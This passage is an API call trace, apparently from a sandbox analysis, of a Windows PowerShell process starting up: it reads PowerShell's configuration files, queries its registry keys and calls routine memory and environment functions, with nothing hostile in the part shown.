	[0562.399] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.400] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.400] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.400] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.400] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.400] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.401] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0562.401] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.789] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.789] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.789] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.790] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.790] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.790] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.791] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.791] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.794] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.795] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.795] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.795] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.796] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.796] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.796] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.797] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.797] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.798] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.798] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.798] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.799] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.799] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.799] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.800] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.806] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.806] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.806] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.807] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.807] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.807] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.808] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.808] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1000, lpOverlapped=0x0) returned 1
	[0563.808] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x1b4, lpOverlapped=0x0) returned 1
	[0563.808] ReadFile (in: hFile=0x324, lpBuffer=0x2ca2168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad268, lpOverlapped=0x0 | out: lpBuffer=0x2ca2168*, lpNumberOfBytesRead=0xad268*=0x0, lpOverlapped=0x0) returned 1
	[0563.809] CloseHandle (hObject=0x324) returned 1
	[0563.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0563.809] SetErrorMode (uMode=0x1) returned 0x1
	[0563.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad1e0 | out: lpFileInformation=0xad1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0563.809] SetErrorMode (uMode=0x1) returned 0x1
	[0563.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0563.809] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad2c8 | out: phkResult=0xad2c8*=0x324) returned 0x0
	[0563.810] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad24c, lpData=0x0, lpcbData=0xad248*=0x0 | out: lpType=0xad24c*=0x1, lpData=0x0, lpcbData=0xad248*=0x56) returned 0x0
	[0563.810] CoTaskMemAlloc (cb=0x5a) returned 0x1b765460
	[0563.810] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad21c, lpData=0x1b765460, lpcbData=0xad218*=0x56 | out: lpType=0xad21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad218*=0x56) returned 0x0
	[0563.810] CoTaskMemFree (pv=0x1b765460) 
	[0563.810] RegCloseKey (hKey=0x324) returned 0x0
	[0563.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0563.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0569.228] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.259] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.261] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0569.261] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0570.683] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0570.684] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0570.685] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0570.690] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0570.692] VirtualQuery (in: lpAddress=0xabfb0, lpBuffer=0xace70, dwLength=0x30 | out: lpBuffer=0xace70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0573.937] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0573.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0573.938] CoTaskMemFree (pv=0x20dda0) 
	[0575.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad468 | out: phkResult=0xad468*=0x2e4) returned 0x0
	[0575.421] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xad47c, lpData=0x0, lpcbData=0xad478*=0x0 | out: lpType=0xad47c*=0x1, lpData=0x0, lpcbData=0xad478*=0x74) returned 0x0
	[0575.422] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xad3ec, lpData=0x0, lpcbData=0xad3e8*=0x0 | out: lpType=0xad3ec*=0x1, lpData=0x0, lpcbData=0xad3e8*=0x74) returned 0x0
	[0575.422] CoTaskMemAlloc (cb=0x78) returned 0x1a13e0
	[0575.422] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0xad3bc, lpData=0x1a13e0, lpcbData=0xad3b8*=0x74 | out: lpType=0xad3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad3b8*=0x74) returned 0x0
	[0575.422] CoTaskMemFree (pv=0x1a13e0) 
	[0575.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0575.422] SetErrorMode (uMode=0x1) returned 0x1
	[0575.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad340 | out: lpFileInformation=0xad340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0575.422] SetErrorMode (uMode=0x1) returned 0x1
	[0575.423] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0575.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.423] CoTaskMemFree (pv=0x20dda0) 
	[0575.435] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0575.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.435] CoTaskMemFree (pv=0x20dda0) 
	[0575.437] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0575.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.437] CoTaskMemFree (pv=0x20dda0) 
	[0575.439] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0575.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0575.439] CoTaskMemFree (pv=0x20dda0) 
	[0575.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0575.440] SetErrorMode (uMode=0x1) returned 0x1
	[0575.440] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0575.441] GetFileType (hFile=0x2e8) returned 0x1
	[0575.441] SetErrorMode (uMode=0x1) returned 0x1
	[0575.441] GetFileType (hFile=0x2e8) returned 0x1
	[0575.441] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.443] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.444] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.444] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.445] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.445] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0575.445] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x9e2, lpOverlapped=0x0) returned 1
	[0575.445] ReadFile (in: hFile=0x2e8, lpBuffer=0x33496f2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x33496f2*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0575.445] ReadFile (in: hFile=0x2e8, lpBuffer=0x334a1a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x334a1a8*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0575.446] CloseHandle (hObject=0x2e8) returned 1
	[0575.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0575.446] SetErrorMode (uMode=0x1) returned 0x1
	[0575.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0575.446] SetErrorMode (uMode=0x1) returned 0x1
	[0575.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0575.446] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e8) returned 0x0
	[0575.447] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0575.447] CoTaskMemAlloc (cb=0x5a) returned 0x1b764f90
	[0575.447] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x1b764f90, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0575.447] CoTaskMemFree (pv=0x1b764f90) 
	[0575.447] RegCloseKey (hKey=0x2e8) returned 0x0
	[0575.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0575.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0575.454] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xaa6a73aa, Data2=0x662c, Data3=0x453f, Data4=([0]=0x98, [1]=0x57, [2]=0x0, [3]=0x3e, [4]=0xf, [5]=0xd1, [6]=0xff, [7]=0x55))) returned 0x0
